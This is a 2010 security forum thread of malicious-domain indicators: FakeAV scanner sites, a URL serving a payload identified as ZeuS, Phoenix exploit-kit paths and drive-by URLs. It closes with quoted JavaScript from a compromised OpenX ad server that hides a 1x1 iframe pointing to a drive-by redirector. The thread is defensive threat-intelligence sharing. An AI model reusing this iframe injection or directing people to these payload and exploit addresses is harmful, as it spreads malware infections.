Author Topic: Malicious Domains - eoin.miller  (Read 12993 times)

0 Members and 3 Guests are viewing this topic.

June 18, 2010, 04:30:09 pm
Read 12993 times

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
This thread is for the one off's we find.

Fake Scanner Pages:
www2.routesave19.co.cc
www2.netguard37-pd.co.cc

http://www2.routesave19.co.cc/Images/loading.gif
http://www2.routesave19.co.cc/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg

June 21, 2010, 04:24:58 pm
Reply #1

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
FakeAV infected clients POST'ing to:

wellsellit.com

http://wellsellit.com/borders.php

June 22, 2010, 09:01:19 pm
Reply #2

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Exploited clients posting to:

lolopingtroll.org/stats/gate.php?id=84fefcb9

and pulling from:

pulselocums.com.au/media/sound.exe

VirusTotal says its ZeuS:
http://www.virustotal.com/analisis/191d6ac238d6684a385380826bcf34f2698632c2ca9fbc57f4143b0310ea5cc0-1277240374

June 22, 2010, 09:10:09 pm
Reply #3

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Fake Scanners:

www1.softscaner35.co.cc
www1.softscaner36.co.cc
www2.newbless6.co.cc
www1.softscaner34.co.cc

All have the following URL accessible:
/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg

June 25, 2010, 04:47:09 pm
Reply #4

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
More fake scanner pages:

http://www1.trytocleanit-45p.co.cc
http://www1.avsolution31pr.co.cc
http://www2.lordofsave9.co.cc
http://www2.lordofsave4.co.cc

June 28, 2010, 05:08:03 pm
Reply #5

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Fake Scanners:

www1.glory4.co.cc
www1.glory3.co.cc

July 06, 2010, 06:50:01 pm
Reply #6

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Fake Scanner Pages:
www1.oksave9.co.cc

Redirectors to Fake Scanner Pages:
www3.avsolution42.co.cc

July 06, 2010, 08:36:49 pm
Reply #7

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
FakeAV page:

http://antivirglass.com/purchase?pgid=2&r=57.5

July 09, 2010, 05:13:17 pm
Reply #8

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
FakeAV:
http://business.one.strangled.net/3/?c=917

Redirects to FakeAV:
http://pivfeels.com/mytds/go.php?s=17

July 09, 2010, 05:27:29 pm
Reply #9

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Phoenix Exploit kit:

http://decorum76.info/e9t/

More domains on same IP with exploit kits:

decoy56.info/e9t/
extraditelbds.info/e9t/
erratic335.info/e9t/
magnatevhl8.info/q8s/
bristlejfgj8.info/e9t/
inclination19y.info/x0c/

July 13, 2010, 05:15:25 pm
Reply #10

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Drive by's with very low detection rates (1/41):

http://domger.in/d/

VirusTotal Payload Results:
http://www.virustotal.com/analisis/1f75ef5ae8b8c0a8cc13242cd22a75c0e45f443b9a6fe8906287b9c1e6bbb3bb-1279005248

July 15, 2010, 04:58:06 pm
Reply #11

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Phoenix drive by kits:

http://whetcb67.info/n21/ - drive by
http://fglq.info/n2l/l.php?i=3 - payload

July 20, 2010, 10:11:44 pm
Reply #12

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
http://333.gorgrengos.com/b/index.php - driveby

September 01, 2010, 08:03:57 pm
Reply #13

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Drive by:

www.hezhexh.co.cc/x33/

Seeing hacked forums redirect to this (via rpzrtru.co.cc/tds/in.cgi?default). Example of hacked forum link that leads to this drive by:

http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289&start=25

September 01, 2010, 08:34:35 pm
Reply #14

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Drive by:

www.hezhexh.co.cc/x33/

Seeing hacked forums redirect to this (via rpzrtru.co.cc/tds/in.cgi?default). Example of hacked forum link that leads to this drive by:

http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289&start=25

The Openx adserver has been compromised.

http://www.bicycles.net.au/adserver/www/delivery/spc.php?zones=1|2|3
Code: [Select]
var OA_output = new Array();
OA_output['1'] = '';

OA_output['2'] = '';

OA_output['3'] = '';
OA_output['3'] += "<"+"a href=\'http://www.bicycles.net.au/adserver/www/delivery/ck.php?oaparams=2__bannerid=20__zoneid=3__cb=82c8d8ab02__oadest=http%3A%2F%2Fwww.cyclechallenge.com%2FThe-Event-1%2FInternational-Riders%2FWin-a-trip-to-Cycle-Challenge%2Fdefault.aspx\' target=\'_blank\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/images/b9e4c50eff89401296bf4b6e66125934.gif\' width=\'120\' height=\'80\' alt=\'Competition: Contact Lake Taupo Cycle Challenge\' title=\'Competition: Contact Lake Taupo Cycle Challenge\' border=\'0\' /><"+"/a><"+"div id=\'beacon_82c8d8ab02\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/delivery/lg.php?bannerid=20&amp;campaignid=8&amp;zoneid=3&amp;cb=82c8d8ab02\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"iframe src=\"http://rpzrtru.co.cc/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>\n";
Ruining the bad guy's day